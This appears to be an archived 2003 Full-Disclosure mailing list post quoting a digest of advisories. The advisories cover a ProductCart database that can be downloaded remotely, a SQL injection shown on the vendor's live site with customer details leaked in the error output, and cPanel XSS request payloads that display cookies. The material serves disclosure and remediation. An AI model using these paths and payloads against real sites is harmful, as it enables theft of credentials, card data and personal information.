lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
From: booger at unixclan.net (security snot)
Subject: Re: Full-Disclosure digest, Vol 1 #933 - 11
 msgs

Guys -

Could we please limit the length of included replies on this list, to
something sane?  Quoting the entire thread is very annoying.

Thanks.

-----------------------------------------------------------
"Whitehat by day, booger at night - I'm the security snot."
- CISSP / CCNA / A+ Certified - www.unixclan.net/~booger/ -
-----------------------------------------------------------

On Sun, 6 Jul 2003, Markus Nielsen wrote:

> On Sun, 2003-07-06 at 16:00, full-disclosure-request@...ts.netsys.com
> wrote:
> > Send Full-Disclosure mailing list submissions to
> > 	full-disclosure@...ts.netsys.com
> >
> > To subscribe or unsubscribe via the World Wide Web, visit
> > 	http://lists.netsys.com/mailman/listinfo/full-disclosure
> > or, via email, send a message with subject or body 'help' to
> > 	full-disclosure-request@...ts.netsys.com
> >
> > You can reach the person managing the list at
> > 	full-disclosure-admin@...ts.netsys.com
> >
> > When replying, please edit your Subject line so it is more specific
> > than "Re: Contents of Full-Disclosure digest..."
> >
> >
> > Today's Topics:
> >
> >    1. [Vulnerability] : ProductCart database file can be downloaded remotely (Tri Huynh)
> >    2. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (gyrniff)
> >    3. Re: [Vulnerability] : ProductCart database file
> >        can be downloaded remotely (KF)
> >    4. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (morning_wood)
> >    5. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal)
> >    6. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal)
> >    7. Re: tripbid secure codes (Dave Korn)
> >    8. Re: [Vulnerability] : ProductCart database file
> >        can be downloaded remotely (Larry W. Cashdollar)
> >    9. Re: Microsoft Cries Wolf ( again ) (Kristian Hermansen)
> >
> > --__--__--
> >
> > Message: 1
> > From: "Tri Huynh" <trihuynh@...up.com>
> > To: <bugtraq@...urityfocus.com>
> > Cc: <full-disclosure@...ts.netsys.com>
> > Date: Sat, 5 Jul 2003 13:07:51 -0700
> > Subject: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> >
> > This is a multi-part message in MIME format.
> >
> > ------=_NextPart_000_0053_01C342F6.70CDCF30
> > Content-Type: text/plain;
> > 	charset="iso-8859-1"
> > Content-Transfer-Encoding: quoted-printable
> >
> > ProductCart database file can be downloaded remotely
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> >
> > PROGRAM: ProductCart
> > HOMEPAGE: http://www.earlyimpact.com/productcart/
> > VULNERABLE VERSIONS: 1.0 to 2.0
> > RISK: High
> >
> >
> > DESCRIPTION
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> >
> > ProductCart=AE is an ASP shopping cart that combines sophisticated=20
> > ecommerce features with time-saving store management tools and =
> > remarkable=20
> > ease of use. It is widely used by many e-commerce sites.
> >
> > DETAILS
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> >
> > In the default installation, product cart database file is located at=20
> > /productcart/database/EIPC.mdb which can be accessed easily
> > by any remote attackers.
> >
> > Sample: http://victimhost/productcart/database/EIPC.mdb
> >
> > The database file includes the store administration password as well as=20
> > customer's info (including credit card info).=20
> > =20
> >
> >  WORKAROUND
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> >
> > Rename the database file, put it in a protected directory.
> >
> >
> > CREDITS
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> >
> > Discovered by Tri Huynh from Sentry Union
> >
> >
> > DISLAIMER
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> >
> > The information within this paper may change without notice. Use of
> > this information constitutes acceptance for use in an AS IS condition.
> > There are NO warranties with regard to this information. In no event
> > shall the author be liable for any damages whatsoever arising out of
> > or in connection with the use or spread of this information. Any use
> > of this information is at the user's own risk.
> >
> >
> > FEEDBACK
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> >
> > Please send suggestions, updates, and comments to: trihuynh@...up.com
> >
> >
> >
> >
> > ------=_NextPart_000_0053_01C342F6.70CDCF30
> > Content-Type: text/html;
> > 	charset="iso-8859-1"
> > Content-Transfer-Encoding: quoted-printable
> >
> > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
> > <HTML><HEAD>
> > <META http-equiv=3DContent-Type content=3D"text/html; =
> > charset=3Diso-8859-1">
> > <META content=3D"MSHTML 6.00.2800.1106" name=3DGENERATOR>
> > <STYLE></STYLE>
> > </HEAD>
> > <BODY bgColor=3D#ffffff>
> > <DIV><FONT face=3DArial size=3D2><!--StartFragment -->ProductCart =
> > database file can=20
> > be downloaded=20
> > remotely<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D<BR><BR>PROGRAM:=20
> > ProductCart</FONT></DIV>
> > <DIV><FONT face=3DArial size=3D2>HOMEPAGE: <A=20
> > href=3D"http://www.earlyimpact.com/productcart/">http://www.earlyimpact.c=
> > om/productcart/</A><BR>VULNERABLE=20
> > VERSIONS: 1.0 to 2.0</FONT></DIV>
> > <DIV><FONT face=3DArial size=3D2>RISK: High</FONT></DIV><FONT =
> > face=3DArial size=3D2>
> > <DIV><BR>&nbsp;</DIV>
> > <DIV>DESCRIPTION<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D<BR><BR><!--StartFragment -->ProductCart=AE=20
> > is an ASP shopping cart that combines sophisticated </DIV>
> > <DIV>ecommerce features&nbsp;with time-saving store management tools and =
> >
> > remarkable </DIV>
> > <DIV>ease of use. It is widely used by many e-commerce=20
> > sites.<BR><BR>DETAILS<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>In=20
> > the default installation, product cart database file is located at =
> > </DIV>
> > <DIV>/productcart/database/EIPC.mdb which can be accessed easily</DIV>
> > <DIV>by any remote attackers.</DIV>
> > <DIV>&nbsp;</DIV>
> > <DIV>Sample: <A=20
> > href=3D"http://victimhost/productcart/database/EIPC.mdb">http://victimhos=
> > t/productcart/database/EIPC.mdb</A></DIV>
> > <DIV>&nbsp;</DIV>
> > <DIV>The database file includes the store administration password as =
> > well as=20
> > </DIV>
> > <DIV>customer's info (including credit card&nbsp;info). </DIV>
> > <DIV>&nbsp;<BR><BR>=20
> > WORKAROUND<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D<BR><BR>Rename=20
> > the database file, put it in a protected=20
> > directory.<BR><BR><BR>CREDITS<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>Discovered=20
> > by Tri Huynh from Sentry Union</DIV>
> > <DIV><BR><BR>DISLAIMER<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>The=20
> > information within this paper may change without notice. Use of<BR>this=20
> > information constitutes acceptance for use in an AS IS =
> > condition.<BR>There are=20
> > NO warranties with regard to this information. In no event<BR>shall the =
> > author=20
> > be liable for any damages whatsoever arising out of<BR>or in connection =
> > with the=20
> > use or spread of this information. Any use<BR>of this information is at =
> > the=20
> > user's own=20
> > risk.<BR><BR><BR>FEEDBACK<BR>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D=3D=3D=3D=3D<BR><BR>Please=20
> > send suggestions, updates, and comments to: <A=20
> > href=3D"mailto:trihuynh@...up.com">trihuynh@...up.com</A><BR><BR><BR><BR>=
> > </DIV></FONT></BODY></HTML>
> >
> > ------=_NextPart_000_0053_01C342F6.70CDCF30--
> >
> >
> > --__--__--
> >
> > Message: 2
> > From: gyrniff <b240503@...niff.dk>
> > To: full-disclosure@...ts.netsys.com
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> > Date: Sat, 5 Jul 2003 19:37:41 +0200
> >
> > URL:
> > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > Change the name Paul to Paul'
> >
> > Microsoft OLE DB Provider for ODBC Drivers
> >  error '80040e14'
> > [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> > query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> > address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> > /productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> >
> > have a nice weekend ;-)
> >
> > On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > > ProductCart database file can be downloaded remotely
> > > =================================================
> > >
> > > PROGRAM: ProductCart
> > > HOMEPAGE: http://www.earlyimpact.com/productcart/
> > > VULNERABLE VERSIONS: 1.0 to 2.0
> > > RISK: High
> > >
> > >
> > > DESCRIPTION
> > > =================================================
> > >
> > > ProductCart? is an ASP shopping cart that combines sophisticated
> > > ecommerce features with time-saving store management tools and remarkable
> > > ease of use. It is widely used by many e-commerce sites.
> > >
> > > DETAILS
> > > =================================================
> > >
> > > In the default installation, product cart database file is located at
> > > /productcart/database/EIPC.mdb which can be accessed easily
> > > by any remote attackers.
> > >
> > > Sample: http://victimhost/productcart/database/EIPC.mdb
> > >
> > > The database file includes the store administration password as well as
> > > customer's info (including credit card info).
> > >
> > >
> > >  WORKAROUND
> > > =================================================
> > >
> > > Rename the database file, put it in a protected directory.
> > >
> > >
> > > CREDITS
> > > =================================================
> > >
> > > Discovered by Tri Huynh from Sentry Union
> > >
> > >
> > > DISLAIMER
> > > =================================================
> > >
> > > The information within this paper may change without notice. Use of
> > > this information constitutes acceptance for use in an AS IS condition.
> > > There are NO warranties with regard to this information. In no event
> > > shall the author be liable for any damages whatsoever arising out of
> > > or in connection with the use or spread of this information. Any use
> > > of this information is at the user's own risk.
> > >
> > >
> > > FEEDBACK
> > > =================================================
> > >
> > > Please send suggestions, updates, and comments to: trihuynh@...up.com
> >
> >
> > --__--__--
> >
> > Message: 3
> > Date: Sat, 05 Jul 2003 15:30:28 -0400
> > From: KF <dotslash@...soft.com>
> > To: gyrniff <b240503@...niff.dk>
> > CC: full-disclosure@...ts.netsys.com
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file
> >  can be downloaded remotely
> >
> > Was that legit California data? I am sure than making someone have a
> > nice weekend you just made multiple someones have a shitty month ahead
> > of them...
> > http://www.theregister.co.uk/content/55/31509.html
> >
> > -KF
> >
> > gyrniff wrote:
> >
> > >URL:
> > >http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > >Change the name Paul to Paul'
> > >
> > >Microsoft OLE DB Provider for ODBC Drivers
> > > error '80040e14'
> > >[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in
> > >query expression ''Paul'',lastName='Smith',customerCompany='Early Impact',
> > >address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > >stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
> > >/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36
> > >
> > >have a nice weekend ;-)
> > >
> > >On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > >
> > >
> > >>ProductCart database file can be downloaded remotely
> > >>=================================================
> > >>
> > >>PROGRAM: ProductCart
> > >>HOMEPAGE: http://www.earlyimpact.com/productcart/
> > >>VULNERABLE VERSIONS: 1.0 to 2.0
> > >>RISK: High
> > >>
> > >>
> > >>DESCRIPTION
> > >>=================================================
> > >>
> > >>ProductCart? is an ASP shopping cart that combines sophisticated
> > >>ecommerce features with time-saving store management tools and remarkable
> > >>ease of use. It is widely used by many e-commerce sites.
> > >>
> > >>DETAILS
> > >>=================================================
> > >>
> > >>In the default installation, product cart database file is located at
> > >>/productcart/database/EIPC.mdb which can be accessed easily
> > >>by any remote attackers.
> > >>
> > >>Sample: http://victimhost/productcart/database/EIPC.mdb
> > >>
> > >>The database file includes the store administration password as well as
> > >>customer's info (including credit card info).
> > >>
> > >>
> > >> WORKAROUND
> > >>=================================================
> > >>
> > >>Rename the database file, put it in a protected directory.
> > >>
> > >>
> > >>CREDITS
> > >>=================================================
> > >>
> > >>Discovered by Tri Huynh from Sentry Union
> > >>
> > >>
> > >>DISLAIMER
> > >>=================================================
> > >>
> > >>The information within this paper may change without notice. Use of
> > >>this information constitutes acceptance for use in an AS IS condition.
> > >>There are NO warranties with regard to this information. In no event
> > >>shall the author be liable for any damages whatsoever arising out of
> > >>or in connection with the use or spread of this information. Any use
> > >>of this information is at the user's own risk.
> > >>
> > >>
> > >>FEEDBACK
> > >>=================================================
> > >>
> > >>Please send suggestions, updates, and comments to: trihuynh@...up.com
> > >>
> > >>
> > >
> > >_______________________________________________
> > >Full-Disclosure - We believe in it.
> > >Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> > >
> > >
> >
> >
> >
> > --__--__--
> >
> > Message: 4
> > From: "morning_wood" <se_cur_ity@...mail.com>
> > To: "gyrniff" <b240503@...niff.dk>, <full-disclosure@...ts.netsys.com>
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
> > Date: Sat, 5 Jul 2003 15:24:46 -0700
> >
> > vuln to XSS too..
> >
> > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/manageCategories.asp
> >
> > ----- Original Message -----
> > From: "gyrniff" <b240503@...niff.dk>
> > To: <full-disclosure@...ts.netsys.com>
> > Sent: Saturday, July 05, 2003 10:37 AM
> > Subject: Re: [Full-Disclosure] [Vulnerability] : ProductCart database
> > file can be downloaded remotely
> >
> >
> > > URL:
> > >
> > http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239
> > > Change the name Paul to Paul'
> > >
> > > Microsoft OLE DB Provider for ODBC Drivers
> > >  error '80040e14'
> > > [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing
> > operator) in
> > > query expression ''Paul'',lastName='Smith',customerCompany='Early
> > Impact',
> > > address='3226 Colorado Ave', city='Santa Monica', zip='90004',
> > > stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE
> > idCustomer=115'.
> > > /productcart/build_to_order/productcart/pcadmin/processOrder.asp,
> > line 36
> > >
> > > have a nice weekend ;-)
> > >
> > > On Saturday 05 July 2003 22:07, Tri Huynh wrote:
> > > > ProductCart database file can be downloaded remotely
> > > > =================================================
> > > >
> > > > PROGRAM: ProductCart
> > > > HOMEPAGE: http://www.earlyimpact.com/productcart/
> > > > VULNERABLE VERSIONS: 1.0 to 2.0
> > > > RISK: High
> > > >
> > > >
> > > > DESCRIPTION
> > > > =================================================
> > > >
> > > > ProductCart? is an ASP shopping cart that combines sophisticated
> > > > ecommerce features with time-saving store management tools and
> > remarkable
> > > > ease of use. It is widely used by many e-commerce sites.
> > > >
> > > > DETAILS
> > > > =================================================
> > > >
> > > > In the default installation, product cart database file is located
> > at
> > > > /productcart/database/EIPC.mdb which can be accessed easily
> > > > by any remote attackers.
> > > >
> > > > Sample: http://victimhost/productcart/database/EIPC.mdb
> > > >
> > > > The database file includes the store administration password as
> > well as
> > > > customer's info (including credit card info).
> > > >
> > > >
> > > >  WORKAROUND
> > > > =================================================
> > > >
> > > > Rename the database file, put it in a protected directory.
> > > >
> > > >
> > > > CREDITS
> > > > =================================================
> > > >
> > > > Discovered by Tri Huynh from Sentry Union
> > > >
> > > >
> > > > DISLAIMER
> > > > =================================================
> > > >
> > > > The information within this paper may change without notice. Use
> > of
> > > > this information constitutes acceptance for use in an AS IS
> > condition.
> > > > There are NO warranties with regard to this information. In no
> > event
> > > > shall the author be liable for any damages whatsoever arising out
> > of
> > > > or in connection with the use or spread of this information. Any
> > use
> > > > of this information is at the user's own risk.
> > > >
> > > >
> > > > FEEDBACK
> > > > =================================================
> > > >
> > > > Please send suggestions, updates, and comments to:
> > trihuynh@...up.com
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> > >
> >
> > --__--__--
> >
> > Message: 5
> > From: Ory Segal <ORY.SEGAL@...CTUMINC.COM>
> > To: "BugTraq (E-mail)" <BUGTRAQ@...URITYFOCUS.COM>,
> >    "Full Disclosure (E-mail)" <full-disclosure@...ts.netsys.com>,
> >    "WebAppSec (E-mail)" <webappsec@...URITYFOCUS.COM>
> > Date: Sun, 6 Jul 2003 01:39:33 -0700
> > Subject: [Full-Disclosure] cPanel Malicious HTML Tags Injection Vulnerability
> >
> > This message is in MIME format. Since your mail reader does not understand
> > this format, some or all of this message may not be legible.
> >
> > ------_=_NextPart_001_01C3439A.1FBE84F0
> > Content-Type: text/plain;
> > 	charset="iso-8859-1"
> >
> > ////////////////////////////////////////////////////////////////////////////
> > ///
> > //==========================>> Security Advisory
> > <<==========================//
> > ////////////////////////////////////////////////////////////////////////////
> > ///
> >
> > ----------------------------------------------------------------------------
> > ---
> > -----[ cPanel Malicious HTML Tags Injection Vulnerability
> > ----------------------------------------------------------------------------
> > ---
> >
> > --[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com
> > --[ Discovery Date: 06/17/2003 (Vendor was notified)
> > --[ Release Date: 07/06/2003
> > --[ Product: Tested on cPanel 6.4.2-STABLE
> > --[ Severity: Medium
> > --[ CVE: Not assigned yet
> >
> > --[ Summary
> >
> > From the vendor's web site:
> > "...The Cpanel interface is a client side interface, which allows your
> > customers
> > to easily control a web hosting account. With the touch of a button, they
> > can
> > add e-mail accounts, access their files, backup their files, setup a
> > shopping
> > cart, and more..."
> >
> > Web users can embed Malicious HTML tags in HTTP requests, which will later
> > be parsed by the web site administrator's browser, in several cPanel
> > screens.
> > This may lead to theft of cookies associated with the domain, or execution
> > of
> > client-side scripts in the administrator's browser.
> >
> > --[ Description
> >
> > The 'Error Log' and 'Latest Visitors' screens in cPanel, provide the web
> > site
> > administrator with HTTP request logs. These scripts do not sanitize the URL
> > part
> > of HTTP requests and present them to the administrator as is, thus, allowing
> > an
> > attacker to embed malicious HTML tags that will later be parsed and executed
> > by
> > the administrators browser.
> >
> > For example, lets take a look at the 'Error Log' screen:
> >
> > [From errlog.html]
> > ...
> > <b>Last 300 Error Log Messages in reverse order:</b><hr>
> > <pre>
> > [Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist:
> > /home/dir/public_html/foobar.html
> > </pre>
> > ...
> >
> > The following request will present a pop-up screen with the cookies
> > that are currently associated with the domain:
> >
> >   GET /<script>alert(document.cookie);</script> HTTP/1.0
> >   Host: www.site.com
> >
> >
> > --[ Note
> >
> > The 'Latest Visitors' screen of the tested version (6.4.2-STABLE) presented
> > the
> > latest requests as HTML links, thus the malicious payload must terminate the
> > <a>
> > tag before opening a new one. For example:
> >
> >   GET /"></a><script>alert(document.cookie);</script> HTTP/1.0
> >   Host: www.site.com
> >
> > --[ Solution
> >
> > According to the vendor, the problem was fixed in version 7.0, which can be
> > downloaded at: http://www.cpanel.net/downloads.htm
> >
> >
> >
> >
> >           Ory Segal
> >   Senior Security Engineer
> >         Sanctum, Inc.
> >  http://www.SanctumInc.Com/
> >
> > Ampa Bldg.,  1 Sapir Street.
> > Mail:     P.O.Box      12047
> > Herzliya    46733,    ISRAEL
> >
> > Tel: +972-9-9586077 Ext. 236
> > Fax: +972-9-9576337
> >
> >
> > ------_=_NextPart_001_01C3439A.1FBE84F0
> > Content-Type: text/html;
> > 	charset="iso-8859-1"
> > Content-Transfer-Encoding: quoted-printable
> >
> > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
> > <HTML>
> > <HEAD>
> > <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
> > charset=3Diso-8859-1">
> > <META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version =
> > 5.5.2653.12">
> > <TITLE>cPanel Malicious HTML Tags Injection Vulnerability</TITLE>
> > </HEAD>
> > <BODY>
> >
> > <P><FONT =
> > SIZE=3D2>///////////////////////////////////////////////////////////////=
> > ////////////////</FONT>
> > <BR><FONT =
> > SIZE=3D2>//=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D=3D&gt;&gt; Security Advisory =
> > &lt;&lt;=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
> > =3D=3D=3D=3D//</FONT>
> > <BR><FONT =
> > SIZE=3D2>///////////////////////////////////////////////////////////////=
> > ////////////////</FONT>
> > </P>
> >
> > <P><FONT =
> > SIZE=3D2>---------------------------------------------------------------=
> > ----------------</FONT>
> > <BR><FONT SIZE=3D2>-----[ cPanel Malicious HTML Tags Injection =
> > Vulnerability</FONT>
> > <BR><FONT =
> > SIZE=3D2>---------------------------------------------------------------=
> > ----------------</FONT>
> > </P>
> >
> > <P><FONT SIZE=3D2>--[ Author: Ory Segal, Sanctum inc. <A =
> > HREF=3D"http://www.SanctumInc.com" =
> > TARGET=3D"_blank">http://www.SanctumInc.com</A></FONT>
> > <BR><FONT SIZE=3D2>--[ Discovery Date: 06/17/2003 (Vendor was =
> > notified)</FONT>
> > <BR><FONT SIZE=3D2>--[ Release Date: 07/06/2003 </FONT>
> > <BR><FONT SIZE=3D2>--[ Product: Tested on cPanel 6.4.2-STABLE</FONT>
> > <BR><FONT SIZE=3D2>--[ Severity: Medium</FONT>
> > <BR><FONT SIZE=3D2>--[ CVE: Not assigned yet</FONT>
> > </P>
> >
> > <P><FONT SIZE=3D2>--[ Summary</FONT>
> > </P>
> >
> > <P><FONT SIZE=3D2>From the vendor's web site:</FONT>
> > <BR><FONT SIZE=3D2>&quot;...The Cpanel interface is a client side =
> > interface, which allows your customers </FONT>
> > <BR><FONT SIZE=3D2>to easily control a web hosting account. With the =
> > touch of a button, they can </FONT>
> > <BR><FONT SIZE=3D2>add e-mail accounts, access their files, backup =
> > their files, setup a shopping </FONT>
> > <BR><FONT SIZE=3D2>cart, and more...&quot;</FONT>
> > </P>
> >
> > <P><FONT SIZE=3D2>Web users can embed Malicious HTML tags in HTTP =
> > requests, which will later </FONT>
> > <BR><FONT SIZE=3D2>be parsed by the web site administrator's browser, =
> > in several cPanel screens. </FONT>
> > <BR><FONT SIZE=3D2>This may lead to theft of cookies associated with =
> > the domain, or execution of </FONT>
> > <BR><FONT SIZE=3D2>client-side scripts in the administrator's =
> > browser.</FONT>
> > <BR><FONT SIZE=3D2>&nbsp;</FONT>
> > <BR><FONT SIZE=3D2>--[ Description</FONT>
> > </P>
> >
> > <P><FONT SIZE=3D2>The 'Error Log' and 'Latest Visitors' screens in =
> > cPanel, provide the web site </FONT>
> > <BR><FONT SIZE=3D2>administrator with HTTP request logs. These scripts =
> > do not sanitize the URL part </FONT>
> > <BR><FONT SIZE=3D2>of HTTP requests and present them to the =
> > administrator as is, thus, allowing an </FONT>
> > <BR><FONT SIZE=3D2>attacker to embed malicious HTML tags that will =
> > later be parsed and executed by </FONT>
> > <BR><FONT SIZE=3D2>the administrators browser.</FONT>
> > </P>
> >
> > <P><FONT SIZE=3D2>For example, lets take a look at the 'Error Log' =
> > screen:</FONT>
> > </P>
> >
> > <P><FONT SIZE=3D2>[From errlog.html]</FONT>
> > <BR><FONT SIZE=3D2>...</FONT>
> > <BR><FONT SIZE=3D2>&lt;b&gt;Last 300 Error Log Messages in reverse =
> > order:&lt;/b&gt;&lt;hr&gt;</FONT>
> > <BR><FONT SIZE=3D2>&lt;pre&gt;</FONT>
> > <BR><FONT SIZE=3D2>[Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] =
> > File does not exist: </FONT>
> > <BR><FONT SIZE=3D2>/home/dir/public_html/foobar.html</FONT>
> > <BR><FONT SIZE=3D2>&lt;/pre&gt;</FONT>
> > <BR><FONT SIZE=3D2>...</FONT>
> > </P>
> >
> > <P><FONT SIZE=3D2>The following request will present a pop-up screen =
> > with the cookies </FONT>
> > <BR><FONT SIZE=3D2>that are currently associated with the =
> > domain:</FONT>
> > </P>
> >
> > <P><FONT SIZE=3D2>&nbsp; GET =
> > /&lt;script&gt;alert(document.cookie);&lt;/script&gt; HTTP/1.0</FONT>
> > <BR><FONT SIZE=3D2>&nbsp; Host: www.site.com</FONT>
> > </P>
> > <BR>
> >
> > <P><FONT SIZE=3D2>--[ Note</FONT>
> > </P>
> >
> > <P><FONT SIZE=3D2>The 'Latest Visitors' screen of the tested version =
> > (6.4.2-STABLE) presented the </FONT>
> > <BR><FONT SIZE=3D2>latest requests as HTML links, thus the malicious =
> > payload must terminate the &lt;a&gt; </FONT>
> > <BR><FONT SIZE=3D2>tag before opening a new one. For example:</FONT>
> > </P>
> >
> > <P><FONT SIZE=3D2>&nbsp; GET =
> > /&quot;&gt;&lt;/a&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt=
> > ; HTTP/1.0</FONT>
> > <BR><FONT SIZE=3D2>&nbsp; Host: www.site.com</FONT>
> > </P>
> >
> > <P><FONT SIZE=3D2>--[ Solution</FONT>
> > </P>
> >
> > <P><FONT SIZE=3D2>According to the vendor, the problem was fixed in =
> > version 7.0, which can be </FONT>
> > <BR><FONT SIZE=3D2>downloaded at: <A =
> > HREF=3D"http://www.cpanel.net/downloads.htm" =
> > TARGET=3D"_blank">http://www.cpanel.net/downloads.htm</A></FONT>
> > </P>
> > <BR>
> > <BR>
> > <BR>
> >
> > <P><FONT =
> > SIZE=3D2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Ory =
> > Segal</FONT>
> > <BR><FONT SIZE=3D2>&nbsp; Senior Security Engineer</FONT>
> > <BR><FONT SIZE=3D2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Sanctum, =
> > Inc.</FONT>
> > <BR><FONT SIZE=3D2>&nbsp;<A HREF=3D"http://www.SanctumInc.Com/" =
> > TARGET=3D"_blank">http://www.SanctumInc.Com/</A></FONT>
> > </P>
> >
